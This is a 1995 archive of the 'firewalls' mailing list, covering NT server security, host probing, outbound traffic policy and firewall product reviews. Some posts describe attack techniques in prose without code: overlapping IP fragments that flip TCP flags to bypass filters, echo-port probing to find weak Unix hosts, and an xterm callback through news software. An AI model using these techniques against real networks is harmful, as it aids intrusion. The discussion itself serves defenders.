ucsdext.ucsd.edu (ucsdext.ucsd.edu [132.239.108.211]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA08049 for ; Sat, 13 May 1995 08:26:17 -0700 Received: from sgoetz.extern.ucsd.edu by ucsdext.ucsd.edu (5.x/SMI-SVR4) id AA13318; Sat, 13 May 1995 08:21:58 -0700 Date: Sat, 13 May 1995 08:21:57 -0700 Message-Id: <9505131521.AA13318@ucsdext.ucsd.edu> X-Sender: stirling@ucsdext.ucsd.edu Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: foxhunter@telalink.net From: stirling@ucsdext.ucsd.edu (Stirling Goetz) Subject: Re: Good all encompassing security guide Cc: firewalls@GreatCircle.COM X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Microsoft distributes a "redbook" called : Microsoft Windows NT Enterprise Planning Guide: Security I'ts mostly about the internals of how the OS handles security in it's various subsystems (i.e. - NetLogon process, NTFS security objects, etc...) Outside of that, any software you add to your server should come with it's own chapter on buttoning it down. The redbook detail on user security help you plan the various accounts that your internet programs run as. The part number on my 02/94 dated copy is 098-54661. When your NT server is secure as a Internet server then you get to dig into all the firewalling docs that came with your firewalling product. Currently I haven't found any firewalling software for NT and normal network cards. Microsoft is currently working on one for NT as we speak but I wouldn't hold my breath for the ship date or a flawless "Microsoft Firewall 1.0". The TCP/IP utils in NT is severely lacking in comparason to Unix. There isn't even a dynamic routing function in the OS, no RIP/OSPF/BGP without buying special routing adapters! So don't even bother looking for packet filtering utils. They really are pushing TCP/IP as their protocol of choice for NT Lans/Wans but they expect you to buy external products to have a full solution. Sheesh! Besides those beefs, I've seen NT serve up SMTP/News/NFS/HTTP/Gopher/FTP/WAIS/PPP/DHCP so it's sneaking behind bussinesses homepages everywhere. >>Date: Wed, 10 May 1995 18:24:19 -0500 >>From: "Jason M. LeBlanc" >>To: firewalls@GreatCircle.COM >>Subject: Good all encompassing security guide >>Sender: firewalls-owner@GreatCircle.COM >>Precedence: bulk >> >>I know that's a misnomer... >>I need security info concerning the internet and NT servers, very new to >>the internet from a server standpoint, so don't beat me too hard. >>Something like 1. plug the thing in... 2. turn it on... 3. click on make me >>secure..., anything like that out there? Course not. But still looking... >> >>Appreciate any help. >>Thanks >>Jason M. LeBlanc >>foxhunter@telalink.net >>MIS >>Last Straw Communications - Stirling (GenX) "Life is what happens while you're making other plans" -Unknown From firewalls-owner Sat May 13 09:13:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA08541 for firewalls-outgoing; Sat, 13 May 1995 09:00:02 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA08525 for ; Sat, 13 May 1995 08:59:57 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA05547; Sat, 13 May 95 11:52:05 -0400 Date: Sat, 13 May 95 11:52:04 -0400 Message-Id: <9505131552.AA05547@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Re: A probe? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk darren rites: >Why would you do this ? SATAN pings hosts before doing a >udpscan on them; a program I wrote 2 years ago would do a UDP scan >but used port 7 (echo) instead of ping/ICMP ECHO to estimate RTT. Problem with ECHO is that not every system supprts it, For example 3000 PCs running popular TCP/IP kernels will not repond yet every "full featured" PC package I know of will respond to a PING. As a result while ECHO might be useful in finding particular boxes, I do not think it would be useful in surveying a system to identify *every* box (which I need to do periodically as a cross-check on our records). Warmly, Padgett From firewalls-owner Sat May 13 09:43:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA08917 for firewalls-outgoing; Sat, 13 May 1995 09:19:48 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA08910 for ; Sat, 13 May 1995 09:19:44 -0700 Message-Id: <199505131619.JAA08910@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA266441889; Sun, 14 May 1995 02:18:09 +1000 From: Darren Reed Subject: Re: IP packet filtering... To: fitz@wang.com (Tom Fitzgerald) Date: Sun, 14 May 1995 02:18:09 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <199505111634.AA23132@fnord.wang.com> from "Tom Fitzgerald" at May 11, 95 12:34:51 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1247 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Tom Fitzgerald, they said: [...] > > > If the reassembly algorithm was broken (like RFC 791's), it could be > > > exploited by cooking up two overlapping fragments: one having a complete > > > TCP header harmless enough to get through the firewall (for example ACK=1 > > > to get through an "established" filter), and the second fragment > > > beginning > > > in the middle of the TCP header, overwriting the flags to set ACK=0, to > > > Bingo. > > 815 fills holes. A hole is where there is no data. > > But that's not enough. If I send the second fragment first, the "hole" > will only include the first 8 bytes of the TCP header. When the fragment > with offset=0 arrives later, the flags won't be dropped into the hole, and > the reassembled packet will have ACK=0. > > If fragments arrive out-of-order, the one with the lower fragment-offset > always has to take precedence, even if it means overwriting part of a > fragment that arrived earlier. Hmmm. Actually, if the target host is BSD based, this neither of these happen. It won't even defrag'd it because the fragments aren't contiguous. Also, it does delete smaller fragments if a larger, all encompsing one is received. darren p.s linux appears safe also. From firewalls-owner Sat May 13 10:13:32 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA09894 for firewalls-outgoing; Sat, 13 May 1995 10:01:05 -0700 Received: from ozarks.sgcl.lib.mo.us (ozarks.sgcl.lib.mo.us [128.206.1.212]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA09881 for ; Sat, 13 May 1995 10:00:59 -0700 Received: by ozarks.sgcl.lib.mo.us (4.1/SMI-4.1) id AA24702; Sat, 13 May 95 12:00:36 CDT Date: Sat, 13 May 1995 12:00:35 -0500 (CDT) From: "B. Joe Smith" Subject: firewall products To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone compiled a list of all the currently available firewall products? Joe Smith (Really!) From firewalls-owner Sat May 13 11:43:29 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA10921 for firewalls-outgoing; Sat, 13 May 1995 11:40:45 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA10916 for ; Sat, 13 May 1995 11:40:41 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id LAA13384; Sat, 13 May 1995 11:37:49 -0700 Received: from ilinx(192.197.176.225) by tera via smap (V1.3) id sma013382; Sat May 13 11:37:24 1995 Received: by ilinx.ilinx.com (/\==/\ Smail3.1.28.1 #28.1) id ; Sat, 13 May 95 11:36 PDT Message-Id: From: brian@ilinx.ilinx.com (Brian J. Murrell) To: padgett@tccslr.dnet.mmc.com Subject: Re[2]: A probe? Cc: firewalls@GreatCircle.COM Date: Sat, 13 May 1995 11:36:41 -0700 (PDT) MIME-Version: 1.0 X-Mailer: Ishmail 1.0.5-386-950210 Available via anonymous ftp from ftp.halsoft.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk from the quill of padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) on scroll <9505131552.AA05547@uvs1.orl.mmc.com> > Problem with ECHO is that not every system supprts it, For example > 3000 PCs running popular TCP/IP kernels will not repond yet every > "full featured" PC package I know of will respond to a PING. I think from a "cracking" point of view, this is a good thing. If I were a cracker, I would not be interested in the PC's at this point in time. I don't think PC TCP/IP packages are at the point yet (they're close) where you can take much advantage of them. Most don't even route between interfaces, and how many people are running daemons on them?? Not many I'd guess. Using ECHO would be a good way to find poorly configured UNIX (and like) boxes. A much better prober than PING for cracking purposes. b. -- Brian J. Murrell brian@ilinx.com InterLinx Support Services, Inc. brian@wimsey.com North Vancouver, B.C. 604 983 UNIX Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD From firewalls-owner Sat May 13 20:34:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA15733 for firewalls-outgoing; Sat, 13 May 1995 19:57:28 -0700 Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA05904 for ; Thu, 11 May 1995 20:17:56 -0700 Received: from [204.57.49.92] by northshore.ecosoft.com with SMTP id AA26748 (5.67a/IDA-1.5 for ); Thu, 11 May 1995 23:18:25 -0400 Date: Thu, 11 May 1995 23:18:25 -0400 Message-Id: <199505120318.AA26748@northshore.ecosoft.com> X-Sender: jr@shore.net Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: jr@vc.com (Jonathan Roosevelt) Subject: Firewall gurus Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I want to hire a technical consultant who is expert in the firewall area to help me make a decision about investing in a privately held firewall company. I will pay $5,000 for technical evaluations of a few firewall products. I welcome any suggestions. Jonathan Roosevelt Battery Ventures 200 Portland Street Boston, MA 02114 voice: (617)367-1011 fax: (617)367-1070 From firewalls-owner Sun May 14 18:16:48 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA26780 for firewalls-outgoing; Sun, 14 May 1995 17:53:50 -0700 Received: from moose.usmcs.maine.edu (moose.usmcs.maine.edu [130.111.131.39]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA26775 for ; Sun, 14 May 1995 17:53:47 -0700 Received: by moose.usmcs.maine.edu (5.57/Ultrix3.0-C) id AA25331; Sun, 14 May 95 20:53:50 -0400 Received: by doc.usmcs.maine.edu; (5.65/1.1.8.2/28Mar95-0848PM) id AA05125; Sun, 14 May 1995 20:53:28 -0400 From: Edward Maillet Message-Id: <9505150053.AA05125@doc.usmcs.maine.edu> Subject: Why control outbound traffic? To: firewalls@greatcircle.com Date: Sun, 14 May 1995 20:53:28 -0400 (EDT) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 533 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hey All, I have a simple question. What are the security risks if a site behind a firewall does not restrict outbound connections? Let's say I have an application level firewall. What are the risks of allowing internal users to ftp, WWW, and telnet (or other) to anywhere they like? Some would argue that information can be sent out to "bad guys" very easily. I agree but I can get information out other ways also so stopping it from going over the net isn't going to stop it from going. ----- Ed Maillet maillet@usmcs.maine.edu From firewalls-owner Sun May 14 19:44:01 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA27493 for firewalls-outgoing; Sun, 14 May 1995 19:34:49 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA27488 for ; Sun, 14 May 1995 19:34:45 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id MAA13338; Mon, 15 May 1995 12:31:14 +1000 Received: from citecuf.citec.qld.gov.au(147.132.176.10) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma013333; Mon May 15 12:31:08 1995 Received: from jaykay.citec.qld.gov.au (jaykay.citec.qld.gov.au [131.242.4.117]) by citecuf.citec.qld.gov.au (8.6.10/8.6.10) with SMTP id MAA09877; Mon, 15 May 1995 12:34:08 +1000 Message-Id: <199505150234.MAA09877@citecuf.citec.qld.gov.au> From: "John Kidston" To: Edward Maillet Date: Mon, 15 May 1995 12:36:19 +10:0 Subject: Re: Why control outbound traffic? Reply-to: j.kidston@citec.qld.gov.au CC: firewalls@GreatCircle.COM Priority: normal X-mailer: Pegasus Mail/Windows (v1.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Edward Maillet wrote: > Subject: Why control outbound traffic? > I have a simple question. What are the security risks if a site behind > a firewall does not restrict outbound connections? Let's say I have an > application level firewall. What are the risks of allowing internal users > to ftp, WWW, and telnet (or other) to anywhere they like? > Some would argue that information can be sent out to "bad guys" very > easily. I agree but I can get information out other ways also so stopping > it from going over the net isn't going to stop it from going. If you monitor outbound traffic, you may even notice who is sending information out to "bad guys"! Some issues to consider are: 1. The network traffic costs associated with unrestricted access. 2. The risks associated with downloaded information (e.g. viruses). 3. The damage to corporate reputation of your people (deliberately or unwittingly) "hacking" other systems. 4. The corporate implications of being named as the "most frequent visitor" to the hottest pornagraphic distribution site (or similar). All of these issues are essentailly behaviour related and can be addressed by education. It is a risk analysis question as to whether the cost of education exceeds the likely effects of uncontrolled traffic. For what it is worth, we currently permit authorised people to telnet, fttp, http anywhere. We don't let them ping, finger, whois, etc. John Kidston j.kidston@citec.qld.gov.au CITEC voice: +61 7 2222356 fax: +61 7 2277890 317 Edward Street, Brisbane 4000, Australia ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "My opinions and CITEC's are not always the same." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Sun May 14 20:13:29 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA27949 for firewalls-outgoing; Sun, 14 May 1995 20:08:49 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA27943 for ; Sun, 14 May 1995 20:08:46 -0700 From: sgrigg@clark.net Received: from sgrigg.clark.net (sgrigg.clark.net [168.143.4.75]) by clark.net (8.6.12/8.6.5) with SMTP id XAA06588 for ; Sun, 14 May 1995 23:08:18 -0400 Received: by sgrigg.clark.net (IBM OS/2 SENDMAIL VERSION 1.3.13B/1.0um) id AA0018; Sun, 14 May 95 23:04:45 -0700 Message-Id: <9505150604.AA0018@sgrigg.clark.net> Mime-Version: 1.0 Date: Sun, 14 May 95 22:59:20 To: firewalls@greatcircle.com Reply-To: sgrigg@clark.net Subject: Pathkey query X-Mailer: Ultimedia Mail/2 Lite, IBM T. J. Watson Research Center Content-Type: text/plain; charset="US-ASCII" Content-Id: <16_60_1_800506767> Content-Transfer-Encoding: 7Bit Content-Description: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I was referred to you by Christopher Klaus I was recently approached by a company from Seattle, Washington called Paralon. They have a number of products called pathkey. The product is supposed to act in many ways like a firewall, however only in the case od the use of phone connections ( modemmm-to-modem ). I was curious as tp whether you had heard of them, and what you coulld tell me about their pathkey products not mentioned during the marketing i received several days ago. Thanks in advanced. //---------------------------------------------------------------------------- // Steve Grigg // Advanced Solutions Group // OPAL Technologies, Inc // 800-321-3366 From firewalls-owner Sun May 14 22:13:35 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA29038 for firewalls-outgoing; Sun, 14 May 1995 21:48:36 -0700 Received: from csc.com (explorer.csc.com [20.1.10.27]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA29031 for ; Sun, 14 May 1995 21:48:33 -0700 Received: by csc.com (Smail3.1.29.1 #1) id m0sAs4n-000iCyC; Mon, 15 May 95 00:48 EDT Date: Mon, 15 May 1995 00:48:17 -0400 (EDT) From: Adam Safier To: Edward Maillet cc: firewalls@greatcircle.com Subject: Re: Why control outbound traffic? In-Reply-To: <9505150053.AA05125@doc.usmcs.maine.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > I have a simple question. What are the security risks if a site behind > a firewall does not restrict outbound connections? Let's say I have an > application level firewall. What are the risks of allowing internal users > to ftp, WWW, and telnet (or other) to anywhere they like? > Some would argue that information can be sent out to "bad guys" very > easily. I agree but I can get information out other ways also so stopping > it from going over the net isn't going to stop it from going. If your company name or address appears frequently on the Internet you might draw some extra unwanted attention. Will someone visiting playboy.com interfere with your download of government sensus data for a marketing campaign? You might want to review your company policy and make certain points clear to the users. I would expect that the same policy used for making local phone calls would apply until you can develop an Internet policy. Assuming your firewall is technically solid, correctly implemented and hides your internal network adequately your risks are probably mostly legal. IMHO, a firewall is only the front gate of your security system. Policy, analysis and planning are major features of a security system. Adam "I speak only for myself!" and other disclaimers. From firewalls-owner Sun May 14 22:26:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA29130 for firewalls-outgoing; Sun, 14 May 1995 21:55:44 -0700 Received: from Badger.Arnold.Com (Badger.Arnold.Com [192.135.80.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA29121 for ; Sun, 14 May 1995 21:55:39 -0700 From: Stephen.L.Arnold@Arnold.Com Received: from Badger.Arnold.Com by Badger.Arnold.Com (PMDF V5.0-3 #9822) id <01HQI3538C9C8WW4XX@Badger.Arnold.Com>; Sun, 14 May 1995 23:55:00 -0500 (CDT) Date: Sun, 14 May 1995 23:51:54 -0500 (CDT) Subject: Re: BorderWare (previously "JANUS") To: Firewalls@GreatCircle.Com Cc: Stephen.L.Arnold@Arnold.Com Message-id: <01HQIFMFTRV28WW4XX@Badger.Arnold.Com> Organization: Arnold Consulting, Inc. MIME-version: 1.0 Content-type: TEXT/PLAIN; CHARSET=US-ASCII Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [Originally sent to firewalls-owner@GreatCircle.Com by mistake on 10-May. Sorry...] > mention of a product previously known as "JANUS" but now called "BorderWare > FireWall Server." Does anyone have experience or input they care to share on > this product? > Thanks in advance! > > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- > "Printmaker gone digital" billcurr@cyberspace.com > http://www.cyberspace.com/billcurr > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- I have no experience with the product, but I'm here in Washington, DC, at the DECUS (Digital Equipment Computer Users Society) National Event, where BorderWare is exhibiting in the trade show. (If I understand correctly, Digital is now reselling Borderware as its low-priced entry firewall. S.E.A.L. continues as the advanced offering.) Borderware seems to be a BSD O.S.-based combination packet filter/ circuit relay/application relay. The O.S. has been stripped to a minimum set of files. (I didn't pursue how they defined "minimum".) It is shipped closed, and it's claimed to have a relatively simple ("as a light switch"!) management interface to turn the supplied, frequently required services (FTP, mail, web, outbound finger, etc.). There is said to be no customization beyond that. (Use S.E.A.L.!) It comes as software or with a correctly configured Pentium-based PC. If I remember correctly (and there's little chance of that!), pricing is $4000 for some number of internal users (100?), $7000 for more (500?), and $11,000 for unlimited users. Security tokens are extra. They resell CRYPTOCard challenge-response tokens (like me) and Security Dynamics time-synchronization tokens. For SecurID, the ACE server runs on the box in the first release. In a later release you can use an existing ACE server on your internal net, thus having a single security database. Please verify the information above, as I've not checked it! Browse http://www.border.com/ for more information. I hope this will be of some initial help. Regards, "Steve" Stephen L. Arnold, Ph.D., President, Arnold Consulting, Inc. Address 2530 Targhee Street, Madison, Wisconsin 53711-5491 U.S.A. Telephone +1 608 278 7700 Facsimile +1 608 278 7701 Internet Stephen.L.Arnold@Arnold.Com Pager (800) 351 8927 From firewalls-owner Sun May 14 23:43:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA00597 for firewalls-outgoing; Sun, 14 May 1995 23:18:39 -0700 Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA00589 for ; Sun, 14 May 1995 23:18:35 -0700 Received: from anubis.network.com by nsco.network.com (4.1/1.34) id AA14929; Mon, 15 May 95 01:36:09 CDT Received: from blefscu.network.com by anubis.network.com (4.1/SMI-4.1) id AA17307; Mon, 15 May 95 01:17:21 CDT Date: Mon, 15 May 95 01:17:21 CDT From: amolitor@anubis.network.com (Andrew Molitor) Message-Id: <9505150617.AA17307@anubis.network.com> To: firewalls@greatcircle.com Subject: Re: Why control outbound traffic? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I haven't seen anyone mention it, so I will. Certain classes of attacks involve doing various things to get some code running on an internal host which constructs things which either are or which look like outbound connections. Remember the 'get INN or cnews to run arbitrary code' thing? I thought at the time that it would be interesting to post something which resulted in starting an xterm up displaying back to somewhere, then wait for xterms to start popping up. If you don't allow outbound X, this sort of attack will go nowhere, and the duffers will move on. Just as a general idea, it's not a bad idea to start out with allowing nothing to flow from any segment to any other segment, modelling the internet as just another segment, and then construct your access policy to poke holes in that baseline rule until everyone can get their job done. Then monitor usage to the best of your ability, close holes that are obselete, open new ones as necessary, etc. This sort of policy by its nature restricts outbound access. Andrew From firewalls-owner Mon May 15 01:13:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA01608 for firewalls-outgoing; Mon, 15 May 1995 00:58:37 -0700 Received: from gaya.kreonet.re.kr (gaya.kreonet.re.kr [134.75.10.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA01596 for ; Mon, 15 May 1995 00:58:10 -0700 Received: from super5.hyundai.co.kr by gaya.kreonet.re.kr (4.1/GAYA-MX-1.0) id AA02002; Mon, 15 May 95 18:02:36 KDT Received: by super5.hyundai.co.kr (4.1/SMI-4.1) id AA11436; Mon, 15 May 95 16:57:44 KDT From: smlim@super5.hyundai.co.kr (Lonely Martian) Message-Id: <9505150657.AA11436@super5.hyundai.co.kr> To: Firewalls@GreatCircle.com Date: Mon, 15 May 1995 16:57:44 +0900 (GMT+9:00) X-Mailer: ELM [version 2.4 PL21-h4] Content-Type: text Content-Length: 18 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk $)Csubscribe me. From firewalls-owner Mon May 15 06:13:39 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA05405 for firewalls-outgoing; Mon, 15 May 1995 05:47:40 -0700 Received: from dcc.com (dcc.com [204.147.93.33]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA05400 for ; Mon, 15 May 1995 05:47:36 -0700 Received: by mail.dcc.com id <58881>; Mon, 15 May 1995 07:47:43 -0500 From: "Moubray, Steve" To: "' firewalls@greatcircle.com'" Subject: Re: BorderWare (previously "JANUS") Date: Mon, 15 May 1995 09:46:00 -0500 Encoding: 43 TEXT X-Mailer: Microsoft Mail V3.0 Message-Id: <95May15.074743cdt.58881@mail.dcc.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > mention of a product previously known as "JANUS" but now called "BorderWare > FireWall Server." Does anyone have experience or input they care to share on > this product? > Thanks in advance! > > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- > "Printmaker gone digital" billcurr@cyberspace.com > http://www.cyberspace.com/billcurr > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- I'm currently using the BorderWare firewall and have installed a couple. It is very easy to use, has limited (none really) operation as a host or WS and it can be used as an Internet server offering WWW, FTP, mail, DNS, finger and news. It performs as a proxy server using circuit relay for outbound traffic. Packet filtering can also be used (which makes it nice for some schools). In bound FTP and Telnet can get through the firewall using onetime passwords provided by the CRYPTO cards. It is configured using pull down menus and the circuit relay required no modification to applications when we installed it here (we use Netscape, news reader, FTP, telnet and mail). The advantage to something like this is that you plug it in, it works, it requires very little maintenance and it's inexpensive. More information can be obtained: www.border.com www.seachange.com www.dcc.com -------------------------------------------------- Steve Moubray DCC, Inc. 10 Second Street NE Minneapolis, MN 55413 (612) 378-4469 (612) 378-4401 Fax smoubray@dcc.com From firewalls-owner Mon May 15 06:49:22 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA05943 for firewalls-outgoing; Mon, 15 May 1995 06:43:15 -0700 Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA05938 for ; Mon, 15 May 1995 06:43:12 -0700 Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id JAA08295; Mon, 15 May 1995 09:38:03 -0400 Date: Mon, 15 May 1995 09:38:03 -0400 (EDT) From: David Miller Subject: Re: Why control outbound traffic? To: Edward Maillet cc: firewalls@greatcircle.com In-Reply-To: <9505150053.AA05125@doc.usmcs.maine.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 14 May 1995, Edward Maillet wrote: > Hey All, > I have a simple question. What are the security risks if a site behind > a firewall does not restrict outbound connections? Let's say I have an > application level firewall. What are the risks of allowing internal users > to ftp, WWW, and telnet (or other) to anywhere they like? > Some would argue that information can be sent out to "bad guys" very > easily. I agree but I can get information out other ways also so stopping > it from going over the net isn't going to stop it from going. Well, since crackers can get in "other ways" as well, there's really no sense in having a firewall, right? And since no system is 100% secure, there's no real purpose in trying to tighten up security, because there's always a way in, right? All security provisions - policies, products, people, procedures - have different costs and benefits associated with them. research.att.com probably has very different requirements for restrictions on outgoing data than aol.com. Only you, or someone very familiar with your setup and requirements can really evaluate what you need:) > ----- Ed Maillet > maillet@usmcs.maine.edu > --- David ---------------------------------------------------------------------------- It's *amazing* what one can accomplish when one doesn't know what one can't do! From firewalls-owner Mon May 15 07:13:47 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA06135 for firewalls-outgoing; Mon, 15 May 1995 06:51:20 -0700 Received: from hatteras.ch.inri.com (hatteras.ch.inri.com [198.202.184.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA06130 for ; Mon, 15 May 1995 06:51:10 -0700 Received: from assateague (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id JAA00403; Mon, 15 May 1995 09:52:04 -0400 Date: Mon, 15 May 1995 09:52:04 -0400 Message-Id: <199505151352.JAA00403@hatteras.ch.inri.com> X-Sender: wlb@hatteras.ch.inri.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Edward Maillet , firewalls@GreatCircle.COM From: wbunting@inri.com (Bill Bunting) Subject: Re: Why control outbound traffic? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk So to summarize the responses so far... 1. No. There is not a security problem with allowing unrestricted outgoing traffic [from a technical perspective]. 2. Any risk is from your users. Can you trust your users? Are your users responsible? 3. Cost. Can you afford to allow your users unrestricted external access? [Opinions are mine and may not represent the opinions of my employer... etc...] -Bill. At 08:53 PM 5/14/95 -0400, Edward Maillet wrote: >Hey All, > I have a simple question. What are the security risks if a site behind >a firewall does not restrict outbound connections? Let's say I have an >application level firewall. What are the risks of allowing internal users >to ftp, WWW, and telnet (or other) to anywhere they like? > Some would argue that information can be sent out to "bad guys" very >easily. I agree but I can get information out other ways also so stopping >it from going over the net isn't going to stop it from going. >----- Ed Maillet >maillet@usmcs.maine.edu > > From firewalls-owner Mon May 15 07:46:37 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA07135 for firewalls-outgoing; Mon, 15 May 1995 07:31:11 -0700 Received: from cseic.saic.com (CSEIC.SAIC.COM [139.121.32.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA07126 for ; Mon, 15 May 1995 07:31:08 -0700 Received: by cseic.saic.com (4.1/1.34) id AA22128; Mon, 15 May 95 10:29:28 EDT Date: Mon, 15 May 95 10:29:28 EDT From: steveg@cseic.saic.com (Stephen Harold Goldstein) Message-Id: <9505151429.AA22128@cseic.saic.com> To: firewalls@greatcircle.com Subject: Firewall Web Page Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Could someone please send me the *current* URL for the "Firewall Products" Web page maintained by a kind reader of this list? Stephen Goldstein steveg@cseic.saic.com My first computer: A 24K Atari 800, Rev. A ROMS, November 1980 Disclaimer: That's not what I said. From firewalls-owner Mon May 15 08:18:04 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA07109 for firewalls-outgoing; Mon, 15 May 1995 07:30:12 -0700 Received: from seraph.uunet.ca (uunet.ca [142.77.1.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA07104 for ; Mon, 15 May 1995 07:30:09 -0700 Received: from fujitsu.ca ([142.77.30.2]) by mail.uunet.ca with SMTP id <173492-4>; Mon, 15 May 1995 10:31:30 -0400 Received: by fujitsu.ca (4.1/SMI-4.1) id AA00928; Mon, 15 May 95 09:19:05 EDT Received: from falcon.fsbc.ca(192.10.1.205) by fujitsu.fsbc.ca via smap (V1.3) id sma000926; Mon May 15 09:18:52 1995 Received: by falcon (4.1/SMI-4.1) id AA00735; Mon, 15 May 95 09:18:35 EDT Date: Mon, 15 May 1995 09:18:35 -0400 From: rajani@fujitsu.ca (Rajani Ramkaran) Message-Id: <9505151318.AA00735@falcon> To: firewalls@GreatCircle.COM, ellozy@dfci.harvard.edu Subject: Re: Comparative evaluations of firewall products? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I recently asked the same question and here is the response I got. Thanks to everyone that responded! Network World - Mar 6/95 Internet business report - Dec 94 Advanced Systems - 